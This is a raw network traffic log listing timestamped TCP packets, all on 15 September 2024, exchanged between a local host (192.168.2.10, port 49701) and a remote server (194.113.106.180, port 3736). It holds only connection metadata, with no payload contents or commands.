Sep 15, 2024 15:02:27.805780888 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.805792093 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.805850983 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.805850983 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.805855989 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.805869102 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.805881023 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.805895090 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.805921078 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.805952072 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.806817055 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.806916952 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.806926966 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.806935072 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.806941032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.806947947 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.806955099 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.806962013 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.806969881 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.807002068 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.807940960 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.807951927 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.807971001 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.807981014 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.807991982 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.808001041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.808012962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.808020115 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.808031082 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.808041096 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.808058023 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.808082104 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.811249971 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.811280012 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.811335087 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.811389923 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.811402082 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.811414003 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.811424971 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.811435938 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.811440945 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.811446905 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.811460972 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.811480999 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.815582037 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.815598965 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.815612078 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.815623045 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.815635920 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.815648079 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.815651894 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.815660000 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.815681934 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.815694094 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.815764904 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.817522049 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.817559004 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.817573071 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.817600965 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.817636967 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.817648888 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.817661047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.817672014 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.817682981 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.817718983 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.820265055 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.820301056 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.822815895 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.822837114 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.822846889 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.822860956 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.822886944 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.822905064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.822922945 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.822936058 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.822946072 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.822957039 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.822972059 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.822985888 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.825907946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.825921059 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.825938940 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.825949907 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.825958967 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.825961113 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.825973988 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.825978994 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.825988054 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.825999022 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.826000929 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.826035976 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.850738049 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.850774050 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.853924036 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.853965998 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.853975058 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.854011059 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.854043961 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.854055882 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.854079008 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.854110956 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.854140043 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.854161978 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.854195118 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.854201078 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.855334044 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.855380058 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.855402946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.855458021 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.855498075 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.855505943 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.855540037 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.855576038 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.855587006 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.855619907 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.855652094 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.855660915 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.855684042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.855717897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.855720997 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.855771065 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.855803967 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.855812073 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.855839014 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.855870962 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.855880022 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.855906010 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.855946064 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.859396935 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.859425068 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.869205952 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.869266033 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.869317055 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.869327068 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.869410992 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.869458914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.869469881 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.869496107 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.869532108 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.869537115 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.870446920 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.870479107 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.870487928 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.870515108 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.870551109 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.870768070 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.870817900 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.870852947 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.870858908 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.870887041 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.870927095 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.876699924 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.876729965 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.879148006 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.879201889 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.879239082 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.879241943 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.879291058 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.879323006 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.879331112 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.879375935 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.879422903 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.879436016 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.883627892 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.883655071 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.887696981 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.887733936 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.887761116 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.887767076 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.887814999 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.887819052 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.887952089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.887984991 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.887990952 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.888020039 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.888052940 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.888062954 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.891185999 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.891242981 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.891253948 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.891311884 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.891361952 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.891366959 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.891415119 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.891448021 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.891462088 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.891503096 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.891541004 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.896446943 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.896480083 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.896512985 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.896536112 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.896547079 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.896583080 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.896595955 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.896617889 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.896651983 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.896662951 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.896686077 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.896732092 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.897669077 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.897723913 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.897737980 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.897770882 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.897772074 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.897808075 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.897814035 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.897840977 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.897954941 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.897963047 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.898271084 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.898296118 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.898541927 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.898593903 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.898627043 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.898638964 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.898659945 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.898672104 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.898695946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.898730993 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.898736954 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.898766994 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.898801088 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.898839951 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.901958942 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.902030945 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.902065992 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.902081966 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.902098894 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.902133942 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.902141094 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.902168036 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.902175903 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.902201891 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.902245045 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.905744076 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.905771971 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.906210899 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.906222105 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.906233072 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.906264067 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.906374931 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.906387091 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.906398058 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.906408072 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.906425953 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.906451941 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.907964945 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.907968044 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.908000946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.908013105 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.908013105 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.908032894 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.908041954 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.908046961 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.908058882 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.908070087 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.908070087 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.908128977 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.913856983 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.914246082 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.914258003 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.914268970 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.914279938 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.914292097 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.914294004 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.914303064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.914315939 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.914319992 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.914340973 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.914357901 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.916480064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.916598082 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.916608095 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.916632891 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.916663885 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.916676044 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.916686058 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.916697025 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.916699886 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.916723013 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.921717882 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.921749115 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.953011990 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953042030 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953077078 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.953094959 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953145027 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.953164101 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953221083 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953273058 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953305006 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953320026 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.953340054 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953345060 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.953393936 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953433990 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.953444958 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953480959 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953515053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953547001 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953557014 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.953581095 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953613997 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953624010 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.953651905 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953654051 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.953681946 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953716040 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953717947 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.953751087 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953783035 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953814983 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953823090 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.953850031 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953886032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953896999 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.953916073 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.953927994 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.959795952 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.959846020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.959851027 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.959881067 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.959913969 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:27.959928036 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:27.959949017 CEST	3736	49701	194.113.106.180	192.168.2.10
